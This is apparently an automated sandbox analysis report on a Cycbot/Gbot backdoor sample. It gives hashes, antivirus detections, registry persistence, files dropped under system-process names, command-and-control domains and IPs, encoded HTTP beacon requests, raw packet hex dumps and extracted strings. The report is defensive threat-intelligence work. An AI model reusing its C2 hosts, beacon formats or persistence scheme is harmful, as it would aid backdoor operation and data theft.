Analysis Date: 2014-10-09 17:59:28
MD5: 06f83b3243cf4acd15fccb28d10614f2
SHA1: 4c42999eb2d6453c3c6b3a29ca7e1316fb6498fb

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: cbd7204b2963d129d9d40748c1fcfb4d sha1: b7430a08bf327ad1a9b5155bfcff167cf507a53b size: 88576
Section .tls md5: 788eb8dd030e911295a3bf846c1b435c sha1: a8ac4e6731d35841cf8362a36a3e79c68e72a693 size: 1024
Section .data md5: 26047e62bdad38b001c957453f3f2e27 sha1: 7307bf76a30a60da91399d4cab2eee8d08028e13 size: 76288
Section .reloc md5: d77d9be3e4ea960421acd97f81279a86 sha1: 23c587186fd99834a837fb7033964bcd01fadda8 size: 1024
Timestamp: 2005-08-29 01:10:26
PEhash: b28d8e3a72467112c3ec94127f9bf4e0b33163b0
IMPhash: 17e8167e25c6684d6318191de7f9e38c
AV 360 Safe: Gen:Trojan.Heur.KS.2
AV Ad-Aware: Gen:Trojan.Heur.KS.2
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Goolbot.J.gen!Eldorado
AV Avira (antivir): BDS/Cycbot.BP
AV CA (E-Trust Ino): Win32/FakeAlert.J!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Cycbot-38
AV Dr. Web: BackDoor.Gbot.53
AV Emsisoft: Gen:Trojan.Heur.KS.2
AV Eset (nod32): Win32/Cycbot.AF
AV Fortinet: W32/Kryptik.POT!tr
AV Frisk (f-prot): W32/Goolbot.J.gen!Eldorado
AV F-Secure: Gen:Trojan.Heur.KS.2
AV Grisoft (avg): BackDoor.Generic_r.TF
AV Ikarus: Backdoor.Win32.Cycbot
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Backdoor.Win32.Gbot.lvw
AV MalwareBytes: Backdoor.Bot
AV Mcafee: BackDoor-EXI.gen.k
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Trojan.Heur.KS.2
AV Norman: winpe/Cycbot.BD
AV Rising: no_virus
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Cycbot!gen4
AV Trend Micro: BKDR_CYCBOT.SME3
AV VirusBlokAda (vba32): Backdoor.Gbot
AV Yara APT: no_virus
AV Zillya!: Backdoor.Gbot.Win32.1571

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {1ACD3490-8843-47EB-867B-EDDDD7FA37FD}
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {6988405C-71C3-427c-975A-0398706E79EE}
Winsock DNS: resetsystems-1.com
Winsock DNS: 127.0.0.1
Winsock DNS: happyratatuy.com
Winsock DNS: onlineinstitute.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNS: onlineinstitute.com
Type: A
67.227.195.200
DNS: zonedg.com
Type: A
141.8.225.80
DNS: zonedg.com
Type: A
141.8.225.80
DNS: resetsystems-1.com
Type: A
DNS: happyratatuy.com
Type: A
HTTP GET: http://onlineinstitute.com/g7/images/logo.jpg?v53=66&tq=gKZEtzyY5lmCFopZgzz5NP9C1Mlyv6J6%2BczKbZ8v11qe3AcRJNoRZmCUb%2BgKOnbzCFZzXDpoHEu7ndA1pBPVm8Jfal%2B2wODtA9UbXg9t286AdndwJ3wq76cJ7nJfdVHRDrspjY%2FmKEVWhG6nwXT7gGB6FuHsbmwHQ3rFDT56MDJl8igFmJ%2FueKAbAhCG0nF2xJXZA5xSDjcU1jYwz19r8tjU1oAUwCQHtJ6KhywW3LXMVxoQgDWbCWwMrrK%2FVeXhNfaDvm%2BtwjB0i0YP0bPm4vxsqRnvtiktX0Aqw%2Bi%2F3Tk1mVyS4lzznfsb6EhL%2F49TVuznugm1TDG2p68EyKJrXOqCks%2B8UHq6P29jx1Q3NbxgyMAKswY1OkyJvvHpz31KM1kG%2FmpssDrbJ0EPuBp6WJOXk2E7kwktURx3iZ594k8O2YR5%2BjEi2lEUJp9Zv
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNxVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNzVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJsX%2BSNxb5ygm1C4lKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 67.227.195.200:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1037 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f67372f 696d6167 65732f6c   GET /g7/images/l
0x00000010 (00016)   6f676f2e 6a70673f 7635333d 36362674   ogo.jpg?v53=66&t
0x00000020 (00032)   713d674b 5a45747a 7959356c 6d43466f   q=gKZEtzyY5lmCFo
0x00000030 (00048)   705a677a 7a354e50 3943314d 6c797636   pZgzz5NP9C1Mlyv6
0x00000040 (00064)   4a362532 42637a4b 625a3876 31317165   J6%2BczKbZ8v11qe
0x00000050 (00080)   33416352 4a4e6f52 5a6d4355 62253242   3AcRJNoRZmCUb%2B
0x00000060 (00096)   674b4f6e 627a4346 5a7a5844 706f4845   gKOnbzCFZzXDpoHE
0x00000070 (00112)   75376e64 41317042 50566d38 4a66616c   u7ndA1pBPVm8Jfal
0x00000080 (00128)   25324232 774f4474 41395562 58673974   %2B2wODtA9UbXg9t
0x00000090 (00144)   32383641 646e6477 4a337771 3736634a   286AdndwJ3wq76cJ
0x000000a0 (00160)   376e4a66 64564852 44727370 6a592532   7nJfdVHRDrspjY%2
0x000000b0 (00176)   466d4b45 56576847 366e7758 54376747   FmKEVWhG6nwXT7gG
0x000000c0 (00192)   42364675 4873626d 77485133 72464454   B6FuHsbmwHQ3rFDT
0x000000d0 (00208)   35364d44 4a6c3869 67466d4a 25324675   56MDJl8igFmJ%2Fu
0x000000e0 (00224)   654b4162 41684347 306e4632 784a585a   eKAbAhCG0nF2xJXZ
0x000000f0 (00240)   41357853 446a6355 316a5977 7a313972   A5xSDjcU1jYwz19r
0x00000100 (00256)   38746a55 316f4155 77435148 744a364b   8tjU1oAUwCQHtJ6K
0x00000110 (00272)   68797757 334c584d 56786f51 67445762   hywW3LXMVxoQgDWb
0x00000120 (00288)   4357774d 72724b25 32465665 58684e66   CWwMrrK%2FVeXhNf
0x00000130 (00304)   6144766d 25324274 776a4230 69305950   aDvm%2BtwjB0i0YP
0x00000140 (00320)   3062506d 34767873 71526e76 74696b74   0bPm4vxsqRnvtikt
0x00000150 (00336)   58304171 77253242 69253246 33546b31   X0Aqw%2Bi%2F3Tk1
0x00000160 (00352)   6d567953 346c7a7a 6e667362 3645684c   mVyS4lzznfsb6EhL
0x00000170 (00368)   25324634 39545675 7a6e7567 6d315444   %2F49TVuznugm1TD
0x00000180 (00384)   47327036 3845794b 4a72584f 71436b73   G2p68EyKJrXOqCks
0x00000190 (00400)   25324238 55487136 5032396a 78315133   %2B8UHq6P29jx1Q3
0x000001a0 (00416)   4e627867 794d414b 73775931 4f6b794a   NbxgyMAKswY1OkyJ
0x000001b0 (00432)   76764870 7a33314b 4d316b47 2532466d   vvHpz31KM1kG%2Fm
0x000001c0 (00448)   70737344 72624a30 45507542 7036574a   pssDrbJ0EPuBp6WJ
0x000001d0 (00464)   4f586b32 45376b77 6b745552 7833695a   OXk2E7kwktURx3iZ
0x000001e0 (00480)   3539346b 384f3259 52352532 426a4569   594k8O2YR5%2BjEi
0x000001f0 (00496)   326c4555 4a70395a 76204854 54502f31   2lEUJp9Zv HTTP/1
0x00000200 (00512)   2e300d0a 436f6e6e 65637469 6f6e3a20   .0..Connection: 
0x00000210 (00528)   636c6f73 650d0a48 6f73743a 206f6e6c   close..Host: onl
0x00000220 (00544)   696e6569 6e737469 74757465 2e636f6d   ineinstitute.com
0x00000230 (00560)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x00000240 (00576)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000250 (00592)   6c612f32 2e300d0a 0d0a                la/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   786b5825 32425039 68253242 49307344   xkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a71 77253242 69253246 33546b31   ...qw%2Bi%2F3Tk1
0x00000160 (00352)   6d567953 346c7a7a 6e667362 3645684c   mVyS4lzznfsb6EhL
0x00000170 (00368)   25324634 39545675 7a6e7567 6d315444   %2F49TVuznugm1TD
0x00000180 (00384)   47327036 3845794b 4a72584f 71436b73   G2p68EyKJrXOqCks
0x00000190 (00400)   25324238 55487136 5032396a 78315133   %2B8UHq6P29jx1Q3
0x000001a0 (00416)   4e627867 794d414b 73775931 4f6b794a   NbxgyMAKswY1OkyJ
0x000001b0 (00432)   76764870 7a33314b 4d316b47 2532466d   vvHpz31KM1kG%2Fm
0x000001c0 (00448)   70737344 72624a30 45507542 7036574a   pssDrbJ0EPuBp6WJ
0x000001d0 (00464)   4f586b32 45376b77 6b745552 7833695a   OXk2E7kwktURx3iZ
0x000001e0 (00480)   3539346b 384f3259 52352532 426a4569   594k8O2YR5%2BjEi
0x000001f0 (00496)   326c4555 4a70395a 76204854 54502f31   2lEUJp9Zv HTTP/1
0x00000200 (00512)   2e300d0a 436f6e6e 65637469 6f6e3a20   .0..Connection: 
0x00000210 (00528)   636c6f73 650d0a48 6f73743a 206f6e6c   close..Host: onl
0x00000220 (00544)   696e6569 6e737469 74757465 2e636f6d   ineinstitute.com
0x00000230 (00560)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x00000240 (00576)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000250 (00592)   6c612f32 2e300d0a 0d0a                la/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   786b5825 32425039 68253242 49307344   xkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a74   OhLgjh8sG%2BcoJt
0x000000c0 (00192)   58253242 534e7856 4b763937 35586c6d   X%2BSNxVKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a3c 6872202f 3e0a2020   ose....<hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   786b5825 32425039 68253242 49307344   xkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a71 77253242 69253246 33546b31   ...qw%2Bi%2F3Tk1
0x00000160 (00352)   6d567953 346c7a7a 6e667362 3645684c   mVyS4lzznfsb6EhL
0x00000170 (00368)   25324634 39545675 7a6e7567 6d315444   %2F49TVuznugm1TD
0x00000180 (00384)   47327036 3845794b 4a72584f 71436b73   G2p68EyKJrXOqCks
0x00000190 (00400)   25324238 55487136 5032396a 78315133   %2B8UHq6P29jx1Q3
0x000001a0 (00416)   4e627867 794d414b 73775931 4f6b794a   NbxgyMAKswY1OkyJ
0x000001b0 (00432)   76764870 7a33314b 4d316b47 2532466d   vvHpz31KM1kG%2Fm
0x000001c0 (00448)   70737344 72624a30 45507542 7036574a   pssDrbJ0EPuBp6WJ
0x000001d0 (00464)   4f586b32 45376b77 6b745552 7833695a   OXk2E7kwktURx3iZ
0x000001e0 (00480)   3539346b 384f3259 52352532 426a4569   594k8O2YR5%2BjEi
0x000001f0 (00496)   326c4555 4a70395a 76204854 54502f31   2lEUJp9Zv HTTP/1
0x00000200 (00512)   2e300d0a 436f6e6e 65637469 6f6e3a20   .0..Connection: 
0x00000210 (00528)   636c6f73 650d0a48 6f73743a 206f6e6c   close..Host: onl
0x00000220 (00544)   696e6569 6e737469 74757465 2e636f6d   ineinstitute.com
0x00000230 (00560)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x00000240 (00576)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000250 (00592)   6c612f32 2e300d0a 0d0a                la/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   786b5825 32425039 68253242 49307344   xkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a75   OhLgjh8sG%2BcoJu
0x000000c0 (00192)   58253242 534e7a56 4b763937 35586c6d   X%2BSNzVKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a3c 6872202f 3e0a2020   ose....<hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   786b5825 32425039 68253242 49307344   xkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 46383225 3242636f   OhLgjh%2F82%2Bco
0x000000c0 (00192)   4a735825 3242534e 78623579 676d3143   JsX%2BSNxb5ygm1C
0x000000d0 (00208)   346c4b76 39373558 6c6d3547 20485454   4lKv975Xlm5G HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000110 (00272)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000120 (00288)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000130 (00304)   4e542035 2e31290d 0a436f6e 74656e74   NT 5.1)..Content
0x00000140 (00320)   2d4c656e 6774683a 20300d0a 436f6e6e   -Length: 0..Conn
0x00000150 (00336)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x00000160 (00352)   0a567953 346c7a7a 6e667362 3645684c   .VyS4lzznfsb6EhL
0x00000170 (00368)   25324634 39545675 7a6e7567 6d315444   %2F49TVuznugm1TD
0x00000180 (00384)   47327036 3845794b 4a72584f 71436b73   G2p68EyKJrXOqCks
0x00000190 (00400)   25324238 55487136 5032396a 78315133   %2B8UHq6P29jx1Q3
0x000001a0 (00416)   4e627867 794d414b 73775931 4f6b794a   NbxgyMAKswY1OkyJ
0x000001b0 (00432)   76764870 7a33314b 4d316b47 2532466d   vvHpz31KM1kG%2Fm
0x000001c0 (00448)   70737344 72624a30 45507542 7036574a   pssDrbJ0EPuBp6WJ
0x000001d0 (00464)   4f586b32 45376b77 6b745552 7833695a   OXk2E7kwktURx3iZ
0x000001e0 (00480)   3539346b 384f3259 52352532 426a4569   594k8O2YR5%2BjEi
0x000001f0 (00496)   326c4555 4a70395a 76204854 54502f31   2lEUJp9Zv HTTP/1
0x00000200 (00512)   2e300d0a 436f6e6e 65637469 6f6e3a20   .0..Connection: 
0x00000210 (00528)   636c6f73 650d0a48 6f73743a 206f6e6c   close..Host: onl
0x00000220 (00544)   696e6569 6e737469 74757465 2e636f6d   ineinstitute.com
0x00000230 (00560)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x00000240 (00576)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000250 (00592)   6c612f32 2e300d0a 0d0a                la/2.0....


Strings
a.
.h
.
.
.
.
.ZQ%
..
9
.
.
080904b0
1659
3.0.0.1
FileVersion
&No Exit  Shift+N
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
&Yes
0h+rhph
0hZ/^I
0YO[;8
1C"hQ'
1|NJ9V
1$W6[m
1Y;Rv+
2d7@eyw
|`2drAD
2h>6Ph
2hF-h)*
2hOleN
<!?2hS
2hs_RhK
2hvEFd
;3|*+3
*[34"3
?3A#I(]
3}c-gLQ3cD:`
3h	.``
3p{}S~
3^VrkWz
&"3y8^
.3yn:o
42h"h%\$a
4`[2vl4
}45U2hY
$	48i h
4=:Bh1
%4EQOx
 4k"{P7=
52hCV{
+=5d40
6bhRhFK
6Dw$&n7
}{$-6}F
=6%k\`4
6qphph
6xHl}rT
74ws|ypr
7#Bh@h
7O<h"h
7Rh(0hw
7XfA7]
8b(yDcl<ZoV
8EGmn}
}92"[.q
9{HPh)
9zR[f>_
`a7Y8x
_A=CJ^
ADPHn"?Y
Ae2h{?
a"hbh'
aI	+JiO
AJ"h"h
Ajs^6v
AlphaBlend
	)|A|o
<A!o.I
Arh.+7
ArhOD3
_aUdVs
\[AYbH
B^#`&@
bACYV\y
~?bC!@
bh43-	
.(*Bh6G<
Bh8>#)+
bh~ h|
bh\h<D
\Bh?@hf}5
bh`hm'F
bh@hRh5en
bhMwq|8
bh>OZ&^
Bhph=de
bhPh"h
*bhPhqBh
BhTrhV
B]_Hua
,[bn"3
%&b~p0
+"c5}T
]_C<>C
cJq/B`
CoGetMalloc
CoTaskMemFree
CreateProcessA
)d17ep
,,d!2\
,D4T h[j
@.data
DbqTAM
dd"h`h
d\	G7<{+
D~GN9Ep
D^J9t1
dKcm^47
doXPSU>
ds/$2N
D]zA<'
DZ`haI
|?eCrh
Eey`-<s
Ei]Mph
#_eK\AI
EKI"EL
E['LH 
EnumResourceNamesA
eUqd$'
FDi(:n
?Fdvpt
"-&fDy
FindFirstFileW
FRq.^K
	FTP/n
	fwBhc~
( F{wN4
|^G-]]
G0vac)O*
G]-BhQ7O
GetACP
